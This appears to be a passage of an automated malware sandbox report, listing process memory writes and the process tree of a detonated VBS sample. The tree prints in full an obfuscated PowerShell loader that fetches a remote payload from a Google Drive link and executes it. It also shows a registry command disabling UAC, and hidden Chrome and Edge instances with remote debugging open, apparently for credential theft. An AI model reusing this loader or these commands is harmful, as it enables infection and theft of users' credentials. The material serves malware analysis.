PID 4916 wrote to memory of 2416 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 2416 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 2416 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 2416 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 2416 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 2416 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 2416 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 2416 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 4452 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 4452 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 1736 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 1736 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 1736 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 1736 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 1736 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 1736 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 1736 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 1736 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 1736 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 1736 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 1736 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 1736 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 1736 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 1736 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 1736 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 1736 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\92dbf37835455cd68d10e5cf6f750ec2d72de8ec7b8d92ffb751f7ceb8653523.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Jone Semicurvilinear Plimraadden Storywriter #>;$Udlndinge='Ancien';<#Sndag Snydertampens Formulation Forkamres Unrivet Fuldbyrdet #>; function Immenser($Accoucheurers135){If ($host.DebuggerEnabled) {$granerne++;}$kegful=$Systemgruppers+$Accoucheurers135.'Length' - $granerne; for ( $Tyveaarsdagene=4;$Tyveaarsdagene -lt $kegful;$Tyveaarsdagene+=5){$Tostrenget=$Tyveaarsdagene;$Trehager+=$Accoucheurers135[$Tyveaarsdagene];}$Trehager;}function Aegicrania($Skjulesteds){ . ($Indkomstpligtiges) ($Skjulesteds);}$Spiritualty247=Immenser 'OutpM Raso raszMariiIndel,opslDikoaAlbe/Ma i ';$diaschisma=Immenser 'FortT I llEnedsCons1.nre2 rud ';$Unisexuality=' Cog[eyeoNFy.dEMedvTalve.ReflS ileeSingRDesiV eroiChokcKjesEbo lp,dstOAkkoIS aanglobTIn smBuruaSejpnFaitAZip GStheEsandr Wes]Unde:Anky:RadeSKollEIncacSrgeUBegyrSya iUdluTSandYHaknP W eRWiltOCro TDoctoRetsCAnimOR.stlCliv= Wed$kn bdUnbrIDagvATheos uksCDefiHTuskipraeS S,im GraA eng ';$Spiritualty247+=Immenser ' Le 5Pala. Cul0Sp,c Anop(RetrWEriniDue nBu ud AfdoRehaw KatsPers LkkeN ColTElek Demu1 Dor0Fors.Ribb0Havm;.eac OrnaWSlidiAbbrnKloi6 rea4Skye;Thre Progx Hyd6 Imp4Retn;Bigg asr un vVolk:Shel1V,so3nonb1Rnke.Stet0Fo,e)Diab CoulGOmfae OkocSkulkankeoCro./Kapi2Konk0Fem 1Udra0B gh0 C e1 T.l0Immu1B li VoicFWandiAgrersplae,urufTopeoA.tox Ci,/ oh1Plat3 Lik1 T l.Ty,a0Nor ';$Micropaleontologist=Immenser 'AlfoUIndlsNatuESoluRO ga-EfteASfaeGCos EO eaN,shaTmisp ';$pharyngology=Immenser 'Te ehLegatS amtTeaspWhissArch:Lakr/klar/Ad.ldLeverU.foiDri,vVg keSpid. turgFreao looDebigPhthl DipeKany.DraccHosto igmFjor/SaleuGe.fcHovn? ConeWassx ,etpWarroDe,drPrett eo=Heatdmne,ooff wD ganDentltrieo EclaAnchdPlat&BaluiIchtdPors=akad1 M ntBr lI renvDia rHarpdOxyhXRecuTSe oV C pB.ids8OppoiOnyc-SkabCBenokKerna Sacy MadZBioskLag OBog,RRep,LWhig4Uds BParaXFingdBe kF RepVPseueLol hCan 6 FilEKubiOSpar ';$Afstikkerens=Immenser 'Bygg>Pold ';$Indkomstpligtiges=Immenser 'H,loiJonbEBogsx kat ';$Rollings='Forbryderes';$Fornjelsesrejse='\Avlshingstes2.Xyl';Aegicrania (Immenser 'Asga$ CipgFngsl.pvuOMy tb llAOutml Ska:IvitNFu.dareveGValagFaciiLgesN unoGAn slsikkyC ns=Derm$R.prECoveN Apiv.ord:wittA pedpa uaPtar.d psAVaerTKe,eAS un+Sce.$LacefLipoO esiR Mi n,ataJchapEafl.L Br smineeSlikS KlirAdreeAnatjTablsT,roe A.e ');Aegicrania (Immenser ',amf$Co,kG SubL Foro herBOpiuANrmeLRege: litFBedeON nar DemURingD VogRFruge SfafL,nde nkRAfbreDatiNSudacAne.eTraasOdge2K,ns3Fl r5Fab = nor$ CenPUovehHexaATe,rRSurnyRo tn BetgRe no ralReliobackG,ubly In,. Neds,terpPlatL LusIHottTHigh(Rach$ M raVirkfPin s St TComeIDikokKan KMythEslanrSgereImmoN ortsedei)Intr ');Aegicrania (Immenser $Unisexuality);$pharyngology=$Forudreferences235[0];$Aphanozygous=(Immenser ' Adi$UnevGR.velFortO ,hib BorADeliL Edw: GenCLeksyCa dcSminLSan o NedN VasITresCAile=MadsNPseuETuguwG,ne-e vro.errB klujLacteTop CPol,T Bio SkrasTerrYRoqusforetMoo eSultMSeru.ThyrNAirmESpyfTMe t. PseW PopESmmeBSemiCMntrlAcheIfo tE Ma n jerTEksk ');Aegicrania ($Aphanozygous);Aegicrania (Immenser 'Axio$ForeCEncyy Ov.cOpl.luncaosedunIndtiBea.cWean.PodoH .bleBla a Sprd LeveSu er Kl sHete[Ethn$ Dy MCidaiFo kcflder SkvoEa epGe eaGi,al ame SysoKrftn BehtSkrpoYve,lHandoHypegSortiCalisTravtHof ]Sus =Ulde$stemSBejepU stiDallrAngiiPro tInteuFor aColll ettMandy Me.2busl4Thic7Noti ');$Nondeflationary=Immenser ' Epo$VariCPtilySparc l dlLeddoMoton UdliDramcCull.FarlD T ao En,w AcenN sol veroM noaDag,d BesFEmboiSultlBereeOrd,(Kjes$Und.p SprhSulta bjer eiychoknWe ngU.foost rl DewoUdsugWooly.ove,Dyre$ CymRCly.eWessg G naH lltexemtDiskaPaddeHousrEn.esUnde)Dagb ';$Regattaers=$naggingly;Aegicrania (Immenser 'Tra $Xen GGrafl UlvOT anb penaAi wLSino:HattM alaAA,toZErotURhinRThlaK .weAakts= O e(smaktha vEUnd sRearT.ure-FlotpSeriALu.stTankhC vi Toki$UglerbarbEGascg quia Ca,tFrolTSynsaSkafe BalRTranSSpri)Kv l ');while (!$mazurka) {Aegicrania (Immenser ' po$non gPhotlAltao CatbNonsaJil,lTung: BitBTubauLntirJanilVeroeTi stHigh=Outw$ Dimt .unrMariufasteYd.r ') ;Aegicrania $Nondeflationary;Aegicrania (Immenser 'TjrnSParatPan aAestrT.nstTele-B,nkSPy.eL Bl eBry EPiloPCon Fu v4Gip ');Aegicrania (Immenser 'P,an$Os egUrk.l ecaOT adBAr haVirkLJagt:Gi bmpaanABarnzMariuTermRAlonkAgamA Car=C os(EjerTYamseD lmsunnoTSub.-u.baPBrd AStu,TBogoHidrt tyk$LgterOutne NonG MegADisstRaditIndkA HaaE .apRNoncs Cam)Blok ') ;Aegicrania (Immenser 'U vu$ EksgCrepLJussOBetaB t eaBehaLHy l: losSRotukafplrFor u enceBudctYverSFrar=Poss$ ChuGAlarLBanaOUtilBDataAPa.tLCajs:Bi laCompN SigtOverIJ coPBlokY MatostyrNL veITraiNLich+hums+Tier%Pyro$MatsFVagaOU.dnRSin u HalDMalarDo sEHiblFOvere.isfRCha,eSta NKosoC Kr.eTrirs .ve2Prop3 Fll5Runr. Cucc SwaoMerruDoglNNaziTKorr ') ;$pharyngology=$Forudreferences235[$skruets];}$Fortidige=289428;$Tacamahac=30629;Aegicrania (Immenser 'Rusl$Tee,GInd LOmstOPhosbMeleA pdL.ele:Antit pipRPro YSifaKomskKPh nE TartGuldECoy k A rNNit,i PrekBenzSSkil Burl=Su e Ru,GOverEButtT Phy-MyolC T koStavnBr,mtSupeEAsepnbrndTLelw Pneo$InsiRFasee Argg,nkoa Ov,T.isatBagtaNonceraasRHedgsNeg, ');Aegicrania (Immenser ' N,n$ EftgNonll banoKultb ,fsa achlPena:St aIFrees Rego .edcParar Ke ySan mV rieOver Russ= mo Roth[TaclS,ndbyAigls ydrt.alue DenmMy,o.ret CC gaoUnc,nVomivBhlae,bbrrstr tK,al] Aet:Kred:ForsFTilfr Subo icmW ldB Unda,ulpsBru.eSk.r6,rys4SensSSimrtWarsrMenniFedtnT pngLa.i(Gods$Syn.TM,strHumayMicokLi,nkRegne.owat Rege petkDrifnMythi,inakOutcs Co.)Imit ');Aegicrania (Immenser ' fem$Opdrg ,anl OakoRielbMotoAUd.olServ: b pRanb E RodCSediIS rirBrinKAfsku hytlBumkEBusaRRestiA tiNMargg DucESlb,rSquaNEboneLuttsr ce K n= Dr Hor[UnarS kanYDel s lertCor E DevmS,if.Torgt NoneKarixSa ktU,de. SoreMis,nClocc ekoPiped OboIDro nKittGCur ],kva:Subs: OpsATrflSDerecMateiTridIFo s.DigegFrdsE E hTg ngS M ntDeltraccoimuhaN.ectgUdkl( Gen$SymbISyres ilkOVel,CCyt RLy tYMo rMVolaeE cl)N ur ');Aegicrania (Immenser 'Hj,e$AverGS inl Ha.OForfBProda DisLOvid: UpsjU,ocu MasMFlorb OrnUAt acsaboK ela=Bere$Od.rRDukkE pheCeksaiSamlrHadbkSkufuNedrl .aueSilkRNonmiM hanPrecgUnwwe KulrVrdiNStukE ReaSS.pe.StamsBa nuuncabRelesSmittEndorSt kiBenzNMesoGSt r(Dis $TystfAdr oAncyR CerTTy,nIVeleDUnboiSaragMedaeBene,Hie $ NavTCe ea R pc hibAB,limMedlaRigshTo aABrudCK.lb) el ');Aegicrania $Jumbuck;"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Jone Semicurvilinear Plimraadden Storywriter #>;$Udlndinge='Ancien';<#Sndag Snydertampens Formulation Forkamres Unrivet Fuldbyrdet #>; function Immenser($Accoucheurers135){If ($host.DebuggerEnabled) {$granerne++;}$kegful=$Systemgruppers+$Accoucheurers135.'Length' - $granerne; for ( $Tyveaarsdagene=4;$Tyveaarsdagene -lt $kegful;$Tyveaarsdagene+=5){$Tostrenget=$Tyveaarsdagene;$Trehager+=$Accoucheurers135[$Tyveaarsdagene];}$Trehager;}function Aegicrania($Skjulesteds){ . ($Indkomstpligtiges) ($Skjulesteds);}$Spiritualty247=Immenser 'OutpM Raso raszMariiIndel,opslDikoaAlbe/Ma i ';$diaschisma=Immenser 'FortT I llEnedsCons1.nre2 rud ';$Unisexuality=' Cog[eyeoNFy.dEMedvTalve.ReflS ileeSingRDesiV eroiChokcKjesEbo lp,dstOAkkoIS aanglobTIn smBuruaSejpnFaitAZip GStheEsandr Wes]Unde:Anky:RadeSKollEIncacSrgeUBegyrSya iUdluTSandYHaknP W eRWiltOCro TDoctoRetsCAnimOR.stlCliv= Wed$kn bdUnbrIDagvATheos uksCDefiHTuskipraeS S,im GraA eng ';$Spiritualty247+=Immenser ' Le 5Pala. Cul0Sp,c Anop(RetrWEriniDue nBu ud AfdoRehaw KatsPers LkkeN ColTElek Demu1 Dor0Fors.Ribb0Havm;.eac OrnaWSlidiAbbrnKloi6 rea4Skye;Thre Progx Hyd6 Imp4Retn;Bigg asr un vVolk:Shel1V,so3nonb1Rnke.Stet0Fo,e)Diab CoulGOmfae OkocSkulkankeoCro./Kapi2Konk0Fem 1Udra0B gh0 C e1 T.l0Immu1B li VoicFWandiAgrersplae,urufTopeoA.tox Ci,/ oh1Plat3 Lik1 T l.Ty,a0Nor ';$Micropaleontologist=Immenser 'AlfoUIndlsNatuESoluRO ga-EfteASfaeGCos EO eaN,shaTmisp ';$pharyngology=Immenser 'Te ehLegatS amtTeaspWhissArch:Lakr/klar/Ad.ldLeverU.foiDri,vVg keSpid. turgFreao looDebigPhthl DipeKany.DraccHosto igmFjor/SaleuGe.fcHovn? ConeWassx ,etpWarroDe,drPrett eo=Heatdmne,ooff wD ganDentltrieo EclaAnchdPlat&BaluiIchtdPors=akad1 M ntBr lI renvDia rHarpdOxyhXRecuTSe oV C pB.ids8OppoiOnyc-SkabCBenokKerna Sacy MadZBioskLag OBog,RRep,LWhig4Uds BParaXFingdBe kF RepVPseueLol hCan 6 FilEKubiOSpar ';$Afstikkerens=Immenser 'Bygg>Pold ';$Indkomstpligtiges=Immenser 'H,loiJonbEBogsx kat ';$Rollings='Forbryderes';$Fornjelsesrejse='\Avlshingstes2.Xyl';Aegicrania (Immenser 'Asga$ CipgFngsl.pvuOMy tb llAOutml Ska:IvitNFu.dareveGValagFaciiLgesN unoGAn slsikkyC ns=Derm$R.prECoveN Apiv.ord:wittA pedpa uaPtar.d psAVaerTKe,eAS un+Sce.$LacefLipoO esiR Mi n,ataJchapEafl.L Br smineeSlikS KlirAdreeAnatjTablsT,roe A.e ');Aegicrania (Immenser ',amf$Co,kG SubL Foro herBOpiuANrmeLRege: litFBedeON nar DemURingD VogRFruge SfafL,nde nkRAfbreDatiNSudacAne.eTraasOdge2K,ns3Fl r5Fab = nor$ CenPUovehHexaATe,rRSurnyRo tn BetgRe no ralReliobackG,ubly In,. Neds,terpPlatL LusIHottTHigh(Rach$ M raVirkfPin s St TComeIDikokKan KMythEslanrSgereImmoN ortsedei)Intr ');Aegicrania (Immenser $Unisexuality);$pharyngology=$Forudreferences235[0];$Aphanozygous=(Immenser ' Adi$UnevGR.velFortO ,hib BorADeliL Edw: GenCLeksyCa dcSminLSan o NedN VasITresCAile=MadsNPseuETuguwG,ne-e vro.errB klujLacteTop CPol,T Bio SkrasTerrYRoqusforetMoo eSultMSeru.ThyrNAirmESpyfTMe t. PseW PopESmmeBSemiCMntrlAcheIfo tE Ma n jerTEksk ');Aegicrania ($Aphanozygous);Aegicrania (Immenser 'Axio$ForeCEncyy Ov.cOpl.luncaosedunIndtiBea.cWean.PodoH .bleBla a Sprd LeveSu er Kl sHete[Ethn$ Dy MCidaiFo kcflder SkvoEa epGe eaGi,al ame SysoKrftn BehtSkrpoYve,lHandoHypegSortiCalisTravtHof ]Sus =Ulde$stemSBejepU stiDallrAngiiPro tInteuFor aColll ettMandy Me.2busl4Thic7Noti ');$Nondeflationary=Immenser ' Epo$VariCPtilySparc l dlLeddoMoton UdliDramcCull.FarlD T ao En,w AcenN sol veroM noaDag,d BesFEmboiSultlBereeOrd,(Kjes$Und.p SprhSulta bjer eiychoknWe ngU.foost rl DewoUdsugWooly.ove,Dyre$ CymRCly.eWessg G naH lltexemtDiskaPaddeHousrEn.esUnde)Dagb ';$Regattaers=$naggingly;Aegicrania (Immenser 'Tra $Xen GGrafl UlvOT anb penaAi wLSino:HattM alaAA,toZErotURhinRThlaK .weAakts= O e(smaktha vEUnd sRearT.ure-FlotpSeriALu.stTankhC vi Toki$UglerbarbEGascg quia Ca,tFrolTSynsaSkafe BalRTranSSpri)Kv l ');while (!$mazurka) {Aegicrania (Immenser ' po$non gPhotlAltao CatbNonsaJil,lTung: BitBTubauLntirJanilVeroeTi stHigh=Outw$ Dimt .unrMariufasteYd.r ') ;Aegicrania $Nondeflationary;Aegicrania (Immenser 'TjrnSParatPan aAestrT.nstTele-B,nkSPy.eL Bl eBry EPiloPCon Fu v4Gip ');Aegicrania (Immenser 'P,an$Os egUrk.l ecaOT adBAr haVirkLJagt:Gi bmpaanABarnzMariuTermRAlonkAgamA Car=C os(EjerTYamseD lmsunnoTSub.-u.baPBrd AStu,TBogoHidrt tyk$LgterOutne NonG MegADisstRaditIndkA HaaE .apRNoncs Cam)Blok ') ;Aegicrania (Immenser 'U vu$ EksgCrepLJussOBetaB t eaBehaLHy l: losSRotukafplrFor u enceBudctYverSFrar=Poss$ ChuGAlarLBanaOUtilBDataAPa.tLCajs:Bi laCompN SigtOverIJ coPBlokY MatostyrNL veITraiNLich+hums+Tier%Pyro$MatsFVagaOU.dnRSin u HalDMalarDo sEHiblFOvere.isfRCha,eSta NKosoC Kr.eTrirs .ve2Prop3 Fll5Runr. Cucc SwaoMerruDoglNNaziTKorr ') ;$pharyngology=$Forudreferences235[$skruets];}$Fortidige=289428;$Tacamahac=30629;Aegicrania (Immenser 'Rusl$Tee,GInd LOmstOPhosbMeleA pdL.ele:Antit pipRPro YSifaKomskKPh nE TartGuldECoy k A rNNit,i PrekBenzSSkil Burl=Su e Ru,GOverEButtT Phy-MyolC T koStavnBr,mtSupeEAsepnbrndTLelw Pneo$InsiRFasee Argg,nkoa Ov,T.isatBagtaNonceraasRHedgsNeg, ');Aegicrania (Immenser ' N,n$ EftgNonll banoKultb ,fsa achlPena:St aIFrees Rego .edcParar Ke ySan mV rieOver Russ= mo Roth[TaclS,ndbyAigls ydrt.alue DenmMy,o.ret CC gaoUnc,nVomivBhlae,bbrrstr tK,al] Aet:Kred:ForsFTilfr Subo icmW ldB Unda,ulpsBru.eSk.r6,rys4SensSSimrtWarsrMenniFedtnT pngLa.i(Gods$Syn.TM,strHumayMicokLi,nkRegne.owat Rege petkDrifnMythi,inakOutcs Co.)Imit ');Aegicrania (Immenser ' fem$Opdrg ,anl OakoRielbMotoAUd.olServ: b pRanb E RodCSediIS rirBrinKAfsku hytlBumkEBusaRRestiA tiNMargg DucESlb,rSquaNEboneLuttsr ce K n= Dr Hor[UnarS kanYDel s lertCor E DevmS,if.Torgt NoneKarixSa ktU,de. SoreMis,nClocc ekoPiped OboIDro nKittGCur ],kva:Subs: OpsATrflSDerecMateiTridIFo s.DigegFrdsE E hTg ngS M ntDeltraccoimuhaN.ectgUdkl( Gen$SymbISyres ilkOVel,CCyt RLy tYMo rMVolaeE cl)N ur ');Aegicrania (Immenser 'Hj,e$AverGS inl Ha.OForfBProda DisLOvid: UpsjU,ocu MasMFlorb OrnUAt acsaboK ela=Bere$Od.rRDukkE pheCeksaiSamlrHadbkSkufuNedrl .aueSilkRNonmiM hanPrecgUnwwe KulrVrdiNStukE ReaSS.pe.StamsBa nuuncabRelesSmittEndorSt kiBenzNMesoGSt r(Dis $TystfAdr oAncyR CerTTy,nIVeleDUnboiSaragMedaeBene,Hie $ NavTCe ea R pc hibAB,limMedlaRigshTo aABrudCK.lb) el ');Aegicrania $Jumbuck;"

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\SysWOW64\msiexec.exe"

C:\Windows\SysWOW64\cmd.exe

/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Program Files\Google\Chrome\Application\Chrome.exe

--user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffc2ebccc40,0x7ffc2ebccc4c,0x7ffc2ebccc58

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1952,i,16659318223560537130,16815110254272013571,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1948 /prefetch:2

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2108,i,16659318223560537130,16815110254272013571,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2200 /prefetch:3

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2268,i,16659318223560537130,16815110254272013571,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2448 /prefetch:8

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3164,i,16659318223560537130,16815110254272013571,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3172 /prefetch:1

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3196,i,16659318223560537130,16815110254272013571,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3256 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Windows\SysWOW64\msiexec.exe

C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\ipqrymijdbvsnektqezwbayftjyckmdnyw"

C:\Windows\SysWOW64\msiexec.exe

C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\kjvjzes"

C:\Windows\SysWOW64\msiexec.exe

C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\vdbcawdeer"

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4576,i,16659318223560537130,16815110254272013571,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4584 /prefetch:1

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4720,i,16659318223560537130,16815110254272013571,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4320 /prefetch:8

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4856,i,16659318223560537130,16815110254272013571,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4864 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

--user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffc2ea846f8,0x7ffc2ea84708,0x7ffc2ea84718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2188,15044855724024717936,7993560730592589782,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2204 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2188,15044855724024717936,7993560730592589782,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2268 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2188,15044855724024717936,7993560730592589782,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2836 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2188,15044855724024717936,7993560730592589782,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2188,15044855724024717936,7993560730592589782,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3432 /prefetch:1

